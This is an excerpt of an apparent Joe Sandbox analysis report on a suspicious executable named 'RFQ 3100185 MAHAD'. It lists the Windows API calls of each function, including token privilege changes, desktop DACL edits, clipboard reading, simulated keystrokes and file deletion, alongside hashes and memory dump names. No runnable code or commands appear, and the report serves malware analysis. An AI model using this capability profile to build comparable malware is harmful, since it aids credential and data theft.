                                                            • Opcode Fuzzy Hash: b8d010f60d540e0c66091f6f5d3fa2ec49d17ab440838d601d11195c0918941c
                                                            • Instruction Fuzzy Hash: 7FE0CD365002245BC711A654DC46FEE77ADDFC8690F094175F905D7244D96899819690
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 0149C561
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1291150986.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_149a000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 8fd8dd4911bfa105ff14bd73b8a2282eb2b1395173f3d40ba557cb1e0759442d
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 98E0E67498010DDFDB00EFB4D6496AE7FB4EF04301F100161FD01D2281D6309E50CA62
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0081B1CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: cd0e5191e442b9b4664b0d9967a0073a36b72e49e54815e863f07d508471d823
                                                            • Instruction ID: 0e9190fc925f1724f2c2c043a1c2da2507dcaf14d53e98c73d9de745e2c46219
                                                            • Opcode Fuzzy Hash: cd0e5191e442b9b4664b0d9967a0073a36b72e49e54815e863f07d508471d823
                                                            • Instruction Fuzzy Hash: BF12BDB1600248ABEB289F68DC49FEE7BB8FF85710F104519F919DB2D1EB748981CB51
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,00000000), ref: 007CEB4A
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00823AEA
                                                            • IsIconic.USER32(000000FF), ref: 00823AF3
                                                            • ShowWindow.USER32(000000FF,00000009), ref: 00823B00
                                                            • SetForegroundWindow.USER32(000000FF), ref: 00823B0A
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00823B20
                                                            • GetCurrentThreadId.KERNEL32 ref: 00823B27
                                                            • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00823B33
                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00823B44
                                                            • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00823B4C
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00823B54
                                                            • SetForegroundWindow.USER32(000000FF), ref: 00823B57
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B6C
                                                            • keybd_event.USER32(00000012,00000000), ref: 00823B77
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B81
                                                            • keybd_event.USER32(00000012,00000000), ref: 00823B86
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B8F
                                                            • keybd_event.USER32(00000012,00000000), ref: 00823B94
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B9E
                                                            • keybd_event.USER32(00000012,00000000), ref: 00823BA3
                                                            • SetForegroundWindow.USER32(000000FF), ref: 00823BA6
                                                            • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00823BCD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 4f56ad03dd88098a9689ab6b7e4baa2a4f84ad9d4eef698f4f69f0b1be5601e1
                                                            • Instruction ID: 1fabadac65af12bc8ba245fa61491fc924b4b8703d76be4a84101c6eda102c94
                                                            • Opcode Fuzzy Hash: 4f56ad03dd88098a9689ab6b7e4baa2a4f84ad9d4eef698f4f69f0b1be5601e1
                                                            • Instruction Fuzzy Hash: 2B31B4B1A403287BEB202F75AC4AF7F7E6CFB84B60F104415FA05EB1D1D6B45D41AAA0
                                                            APIs
                                                              • Part of subcall function 007EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                              • Part of subcall function 007EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                              • Part of subcall function 007EB134: GetLastError.KERNEL32 ref: 007EB1BA
                                                            • _memset.LIBCMT ref: 007EAD08
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007EAD5A
                                                            • CloseHandle.KERNEL32(?), ref: 007EAD6B
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007EAD82
                                                            • GetProcessWindowStation.USER32 ref: 007EAD9B
                                                            • SetProcessWindowStation.USER32(00000000), ref: 007EADA5
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007EADBF
                                                              • Part of subcall function 007EAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007EACC0), ref: 007EAB99
                                                              • Part of subcall function 007EAB84: CloseHandle.KERNEL32(?,?,007EACC0), ref: 007EABAB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 2134598d7b7255994d71a398854dd87f8d0458dc454c0e0d3cf383b7dab6370b
                                                            • Instruction ID: 635e213e6663234c848f59b58428df92910ba6b3a2582f172e5a64bf1853e38d
                                                            • Opcode Fuzzy Hash: 2134598d7b7255994d71a398854dd87f8d0458dc454c0e0d3cf383b7dab6370b
                                                            • Instruction Fuzzy Hash: 3381ACB1902289FFDF119FA5DC4AAEE7B78FF08304F048119F824A6161E7399E54DB61
                                                            APIs
                                                              • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                              • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007F5FA6,?), ref: 007F6EF1
                                                              • Part of subcall function 007F725E: __wsplitpath.LIBCMT ref: 007F727B
                                                              • Part of subcall function 007F725E: __wsplitpath.LIBCMT ref: 007F728E
                                                              • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                            • _wcscat.LIBCMT ref: 007F6149
                                                            • _wcscat.LIBCMT ref: 007F6167
                                                            • __wsplitpath.LIBCMT ref: 007F618E
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 007F61A4
                                                            • _wcscpy.LIBCMT ref: 007F6209
                                                            • _wcscat.LIBCMT ref: 007F621C
                                                            • _wcscat.LIBCMT ref: 007F622F
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 007F625D
                                                            • DeleteFileW.KERNEL32(?), ref: 007F626E
                                                            • MoveFileW.KERNEL32(?,?), ref: 007F6289
                                                            • MoveFileW.KERNEL32(?,?), ref: 007F6298
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 007F62AD
                                                            • DeleteFileW.KERNEL32(?), ref: 007F62BE
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F62E1
                                                            • FindClose.KERNEL32(00000000), ref: 007F62FD
                                                            • FindClose.KERNEL32(00000000), ref: 007F630B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1917200108-1173974218
                                                            • Opcode ID: a61733ba678fe4cfaffd5b3788bee1b9c1f824b23b88285726fcf2260c4d3885
                                                            • Instruction ID: e7f3eb367834a6ca621a631a357f1b63a7ed5c9b47b60bce95ee39abce4f115f
                                                            • Opcode Fuzzy Hash: a61733ba678fe4cfaffd5b3788bee1b9c1f824b23b88285726fcf2260c4d3885
                                                            • Instruction Fuzzy Hash: F451007290821CAACB21EBA5DC48DEF77BCBF05310F0505E6E645E3241DB7A97498FA4
                                                            APIs
                                                            • OpenClipboard.USER32(0084DC00), ref: 00806B36
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00806B44
                                                            • GetClipboardData.USER32(0000000D), ref: 00806B4C
                                                            • CloseClipboard.USER32 ref: 00806B58
                                                            • GlobalLock.KERNEL32(00000000), ref: 00806B74
                                                            • CloseClipboard.USER32 ref: 00806B7E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00806B93
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00806BA0
                                                            • GetClipboardData.USER32(00000001), ref: 00806BA8
                                                            • GlobalLock.KERNEL32(00000000), ref: 00806BB5
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00806BE9
                                                            • CloseClipboard.USER32 ref: 00806CF6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 091cccf9ba11b5b0bf657491f0f9122fab6f6282cdcd85c8ceda964cd6481617
                                                            • Instruction ID: 6eae796eef8932a6eecc513d12d190a924a1d59d3572a308994daf32f9ec380b
                                                            • Opcode Fuzzy Hash: 091cccf9ba11b5b0bf657491f0f9122fab6f6282cdcd85c8ceda964cd6481617
                                                            • Instruction Fuzzy Hash: 7E51B071200305ABD311AF64DD5AFAF77A8FF94B10F004429F666D71E1EF74E8158A62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 007FF62B
                                                            • FindClose.KERNEL32(00000000), ref: 007FF67F
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007FF6A4
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007FF6BB
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 007FF6E2
                                                            • __swprintf.LIBCMT ref: 007FF72E
                                                            • __swprintf.LIBCMT ref: 007FF767
                                                            • __swprintf.LIBCMT ref: 007FF7BB
                                                              • Part of subcall function 007D172B: __woutput_l.LIBCMT ref: 007D1784
                                                            • __swprintf.LIBCMT ref: 007FF809
                                                            • __swprintf.LIBCMT ref: 007FF858
                                                            • __swprintf.LIBCMT ref: 007FF8A7
                                                            • __swprintf.LIBCMT ref: 007FF8F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 835046349-2428617273
                                                            • Opcode ID: f4b1d1c1c86704a3b2364b3dae5097bae81237bce995fdd8179118c2c23ecd4f
                                                            • Instruction ID: 7a546bd897b5b9d8de3a58b8f2509f30259d8fe34eebfba6ab87c5b3d9c9d798
                                                            • Opcode Fuzzy Hash: f4b1d1c1c86704a3b2364b3dae5097bae81237bce995fdd8179118c2c23ecd4f
                                                            • Instruction Fuzzy Hash: 36A1F0B2508344EBC311EB94C889EAFB7ECBF94704F44491EF695C2252EB38D949C762
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00801B50
                                                            • _wcscmp.LIBCMT ref: 00801B65
                                                            • _wcscmp.LIBCMT ref: 00801B7C
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00801B8E
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00801BA8
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00801BC0
                                                            • FindClose.KERNEL32(00000000), ref: 00801BCB
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00801BE7
                                                            • _wcscmp.LIBCMT ref: 00801C0E
                                                            • _wcscmp.LIBCMT ref: 00801C25
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00801C37
                                                            • SetCurrentDirectoryW.KERNEL32(008639FC), ref: 00801C55
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00801C5F
                                                            • FindClose.KERNEL32(00000000), ref: 00801C6C
                                                            • FindClose.KERNEL32(00000000), ref: 00801C7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 28797e7b35262eb3aeac81adb0774d04e2219b89cd2f77f0d6618e963fc6d748
                                                            • Instruction ID: 62e7e5ee2a25533d0fe2c7e8aa04ee1fb92f073d6c7b5324262fed60284f64ec
                                                            • Opcode Fuzzy Hash: 28797e7b35262eb3aeac81adb0774d04e2219b89cd2f77f0d6618e963fc6d748
                                                            • Instruction Fuzzy Hash: A131A032A00319ABDF50ABB0EC4DADE77ACFF45334F104596E911E31D0EB78DA858A64
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00801CAB
                                                            • _wcscmp.LIBCMT ref: 00801CC0
                                                            • _wcscmp.LIBCMT ref: 00801CD7
                                                              • Part of subcall function 007F6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007F6BEF
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00801D06
                                                            • FindClose.KERNEL32(00000000), ref: 00801D11
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00801D2D
                                                            • _wcscmp.LIBCMT ref: 00801D54
                                                            • _wcscmp.LIBCMT ref: 00801D6B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00801D7D
                                                            • SetCurrentDirectoryW.KERNEL32(008639FC), ref: 00801D9B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00801DA5
                                                            • FindClose.KERNEL32(00000000), ref: 00801DB2
                                                            • FindClose.KERNEL32(00000000), ref: 00801DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: ee665d90c5cb516de13abaa86a9cc0dd32f501b81579317a3a9880d0cc8f37fe
                                                            • Instruction ID: 2c942a77dc0f8427409f3d2b0c3570500b9743d2633816507b5a9a38bf14d7aa
                                                            • Opcode Fuzzy Hash: ee665d90c5cb516de13abaa86a9cc0dd32f501b81579317a3a9880d0cc8f37fe
                                                            • Instruction Fuzzy Hash: 8531C132A0061ABBDF50ABA0EC4DADE77ADFF45334F104956EC11E31D0DB78DA458A64
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                            • API String ID: 2102423945-2023335898
                                                            • Opcode ID: 1fc50c03b0f70e309679416f1c9c2227690770510fc9cc9f2119e276ebbee21f
                                                            • Instruction ID: 06744ad0a1a6c5108b9a4ea57fa731842388e1a2c8547ec8f073b19bffe0f631
                                                            • Opcode Fuzzy Hash: 1fc50c03b0f70e309679416f1c9c2227690770510fc9cc9f2119e276ebbee21f
                                                            • Instruction Fuzzy Hash: 49829071D04229DBCF28CF98C8807EDBBB1FF84314F25816AD955AB251E7789E85CB90
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 008009DF
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 008009EF
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008009FB
                                                            • __wsplitpath.LIBCMT ref: 00800A59
                                                            • _wcscat.LIBCMT ref: 00800A71
                                                            • _wcscat.LIBCMT ref: 00800A83
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00800A98
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00800AAC
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00800ADE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00800AFF
                                                            • _wcscpy.LIBCMT ref: 00800B0B
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00800B4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 3566783562-438819550
                                                            • Opcode ID: 1c2af3c5224d4a94ce9955e3c78a8bc52786d1ade3feb69ce72c8572489b0d96
                                                            • Instruction ID: 74e79169d9a37842e956a0029253f5a9554dda02fd931492d2f58b276b74ddfc
                                                            • Opcode Fuzzy Hash: 1c2af3c5224d4a94ce9955e3c78a8bc52786d1ade3feb69ce72c8572489b0d96
                                                            • Instruction Fuzzy Hash: 346146725083459FD710EF60C848AAEB7E8FF89314F04491EE989C7292EB35E945CF92
                                                            APIs
                                                              • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                              • Part of subcall function 007EABBB: GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                              • Part of subcall function 007EABBB: GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                              • Part of subcall function 007EABBB: HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                              • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                              • Part of subcall function 007EAC56: GetProcessHeap.KERNEL32(00000008,007EA6B5,00000000,00000000,?,007EA6B5,?), ref: 007EAC62
                                                              • Part of subcall function 007EAC56: HeapAlloc.KERNEL32(00000000,?,007EA6B5,?), ref: 007EAC69
                                                              • Part of subcall function 007EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007EA6B5,?), ref: 007EAC7A
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007EA6D0
                                                            • _memset.LIBCMT ref: 007EA6E5
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007EA704
                                                            • GetLengthSid.ADVAPI32(?), ref: 007EA715
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 007EA752
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007EA76E
                                                            • GetLengthSid.ADVAPI32(?), ref: 007EA78B
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007EA79A
                                                            • HeapAlloc.KERNEL32(00000000), ref: 007EA7A1
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007EA7C2
                                                            • CopySid.ADVAPI32(00000000), ref: 007EA7C9
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007EA7FA
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007EA820
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007EA834
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 9493cd8b7f8bb740dcc41ee619bdee3b92dd3ca6b009fad027f9052bb4f324b0
                                                            • Instruction ID: 048d03db4661453bfedef72e9a5c629f341bc4a9a3f2bf3e90cc4543d39f046d
                                                            • Opcode Fuzzy Hash: 9493cd8b7f8bb740dcc41ee619bdee3b92dd3ca6b009fad027f9052bb4f324b0
                                                            • Instruction Fuzzy Hash: 2B514C71901249BFDF05DFA6DC44AEEBBB9FF48300F048529F911AA291D738AE05CB61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
